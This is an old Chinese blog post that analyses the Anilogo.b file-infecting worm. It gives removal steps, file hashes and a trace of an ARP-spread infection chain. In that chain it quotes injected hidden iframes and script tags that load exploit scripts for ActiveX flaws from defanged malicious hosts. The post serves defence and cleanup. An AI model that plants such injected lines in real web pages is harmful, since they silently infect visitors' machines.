加载中…
个人资料
Hades_Expolit
Hades_Expolit
  • 博客等级:
  • 博客积分:0
  • 博客访问:93,831
  • 关注人气:18
  • 获赠金笔:0支
  • 赠出金笔:0支
  • 荣誉徽章:
相关博文
推荐博文
谁看过这篇博文
加载中…
正文 字体大小:

Worm.Win32.Anilogo.b病毒

(2008-07-29 16:46:09)
标签:

it

分类: 毒笼

收集整理:Trojan.ydb.H

最近SOSO问问好多网友中了这个病毒,因为这个病毒比较难杀,现在把网上收集整理的报告告诉大家。这个病毒 Worm.Win32.Anilogo.b ,现在已经出现变种,中文名字叫“冬日桃花”该病毒为蠕虫程序,病毒运行后,搜索可执行文件,在正常文件结构中增加一个名为ani的节。并衍生病毒副本到系统目录下,添加注册表自动运行项,以达到随机启动引导病毒体运行的目的。每一次执行受感染的正常文件都会激活病毒体。从而达到传播自身的目的。受感染用户可以导致应用程序不能正常运行中了它就算你把盘格了,也没有用,它会感染所有.EXE文件,如果装的卡巴的话,卡巴会把感染的.EXE文件删除,这样的话系统就崩溃了.用瑞星也是一样不能点删除感染文件。不过360的网站有感染exe程序专杀工具。

大家可以试试,推荐软件:费尔托斯特安全。

冬日桃花专杀工具:http://bbs.antidu.cn/attachment.php?aid=317

1.在安全模式下搜索病两个文件xp.exe和autorun.inf,都删除掉,然后立刻重启,恢复(重装)系统,重装卡巴并升级最高版本全盘杀毒,注意在重装系统完后,不要打开各个盘符(不然白重装了),病毒会在各盘下建立有自动运行文件,一旦双击就又会激活病毒感染系统文件。关闭139.445端口。

 

2.病毒类型: 感染式蠕虫
文件 MD5: D4BC853EA0191A909EDDC894B744BBF0
危害等级: 高
文件长度: 1,142,914字节
感染系统: Windows 2000,Windows XP,Windows 2003
病毒描述:
该病毒属于感染式,被感染的样本在宿主的尾部添加一个节用来保存病毒代码,修改入口点为病毒
的代码起始位置。

行为分析:本地行为:感染本地的可执行文件,不感染系统文件夹下的文件
注:%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。
Windows2000/NT中默认的安装路径是C:\Winnt\System32,windows95/98/me中默认的安装路径是C:\Windows\System,windowsXP中默认的安装路径是C:\Windows\System32。%Temp% =

C:\Documents andSettings\AAAAA\LocalSettings\Temp

当前用户TEMP缓存变量

%Windir%\ WINDODWS所在目录

%DriveLetter%\ 逻辑驱动器根目录

%ProgramFiles%\ 系统程序默认安装目录

%HomeDrive% = C:\ 当前启动的系统的所在分区

%Documents and Settings%\ 当前用户文档根目录

清除方案:

从最后一个节(.ani)的偏移0x04h处取出宿主的原始入口点EntryOfPoint

删除文件最后一个节(节名称是.ani)

删除最后一个节的节表(.ani)

修正SizeOfImage

修正节数目=原节数目-1

这里需要的工具可以去看雪学院下载 www.pediy.com

3.ARP病毒所加网址传播Worm.Win32.Anilogo,Win32.Logogo.q等
一位网友说他孤电脑网络路由器DHCP获取不到ip地址,网速超慢,重新连接路由器后打开所有网站

,Kaspersky 报告:
/---
恶意 HTTP 对象 <hxxp://***.8***v*8.biz/2.htm>: 已检测 木马程序 Trojan-

Downloader.JS.Psyme.ck.
恶意 HTTP 对象 <hxxp://***.8***v*8.biz/index.html>: 已检测恶意程序

Exploit.Win32.Agent.bb.
---/
并提示:攻击:端口139 或445和局域网中攻击者的ip;网中的一些计算机出现提示信息然后自动重

启的现象。

查看代码,发现代码:
/---
<iframe src=index.html width=0 height=0></iframe>
<iframe src=2.htm width=0 height=0></iframe>
<iframe src=xl.htm width=0 height=0></iframe>  
---/

hxxp://***.8***v*8.biz/index.html 包含 Real 漏洞利用代码。
其中一句代码为:PayLoad += "ChuiZi";

hxxp://***.8***v*8.biz/2.htm 为利用BaiduBar.Tool下载4.CAB。

4.CAB包含文件r.exe:

文件说明符 : D:\temp\r.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-7-24 0:16:18
修改时间 : 2008-7-24 0:16:18
访问时间 : 2008-7-14 22:11:3
大小 : 18326 字节 17.918 KB
MD5 : 2a30052c2cdf9af72008aaf6bec12720
SHA1: 648DF9D731439E9348278FAE9DCC063505CDFE13
CRC32: 91cc38b4

Kaspersky 报为 Worm.Win32.Anilogo.b,瑞星报为 Win32.Logogo.c
并输出代码:
/---
<script src=hxxp://***.9**g*g**.biz/0614.js></script>
<script src=hxxp://***.9**g*g**.biz/MPS.js></script>
<script src=hxxp://***.9**g*g**.biz/PowerPlayerCtrl.js></script>
---/

hxxp://***.9**g*g**.biz/0614.js 利用ado.stream漏洞下载

hxxp://***.9**g*g**.biz/real.exe。
文件说明符 : D:\test\real.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-7-14 21:58:51
修改时间 : 2008-7-14 21:58:51
访问时间 : 2008-7-14 22:7:3
大小 : 19122 字节 18.690 KB
MD5 : 24019d60bfe840c82ac8259a2dfb88dc
SHA1: B299F4A14DF7393ED9F96E58EB379E9B1D21D091
CRC32: 5f5bfae8

Kaspersky 报为 Worm.Win32.AutoRun.apj,
瑞星报为 Win32.Logogo.q

hxxp://***.9**g*g**.biz/MPS.js 为暴风影音2的activex漏洞利用代码

hxxp://***.9**g*g**.biz/PowerPlayerCtrl.js 为PPstream漏洞利用代码

view-source:hxxp://***.8***v*8.biz/xl.htm 为迅雷PPLAYER.DLL_1_WORK ActiveX控件缓冲区

溢出漏洞利用代码

迅雷PPLAYER.DLL_1_WORK ActiveX控件缓冲区溢出漏洞
hxxp://www.nsfocus.net/vulndb/11201

0

阅读 评论 收藏 转载 喜欢 打印举报/Report
  • 评论加载中,请稍候...
发评论

    发评论

    以上网友发言只代表其个人观点,不代表新浪网的观点或立场。

      

    新浪BLOG意见反馈留言板 电话:4000520066 提示音后按1键(按当地市话标准计费) 欢迎批评指正

    新浪简介 | About Sina | 广告服务 | 联系我们 | 招聘信息 | 网站律师 | SINA English | 会员注册 | 产品答疑

    新浪公司 版权所有